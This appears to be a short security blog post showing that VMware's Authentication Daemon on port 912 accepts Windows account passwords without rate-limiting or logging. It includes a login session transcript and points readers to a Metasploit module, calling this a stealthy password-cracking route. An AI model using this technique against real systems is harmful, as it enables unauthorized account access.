I just came across a cool trick you can try which allows you to crack passwords on a remote system that is running the VMware Authentication Daemon. This service installs and runs by default on Windows host machines that have VMware Virtual Workstation installed, and listens on TCP port 912. It shows up on nmap as apex-mesh, but doesn’t follow the APEX protocol at all. Instead, it looks a little bit like a hybrid between an FTP and SMTP server:

220 VMware Authentication Daemon Version 1.0, ServerDaemonProtocol:SOAP, MKSDisplayProtocol:VNC ,
530 Please login with USER and PASS.
USER test
331 Password required for test.
PASS test
530 Login incorrect.
USER Graham
331 Password required for Graham.
PASS <snip>
230 User Graham logged in.
500 Unknown command '?'
500 Unknown command 'HELP'
500 Unknown command 'INFO'
500 Unknown command 'STAT'
CD C:\
500 Unknown command 'CD C:\'
500 Unknown command 'HELO'
500 Unknown command 'HELLO'
500 Unknown command 'EXIT'
221 Goodbye

As you can see, I couldn’t find any working commands. The interesting part is that it accepted my real NT username and password for the machine that the service was running on. Even more interesting, it doesn’t seem to have any rate-limiting or obvious “failed attempt” logs, so it’s much more stealthy than attacking RDP or SMB directly. In fact, this may translate over to Linux user accounts, too.

It turns out that someone already created a metasploit module for exactly this purpose, so go nuts!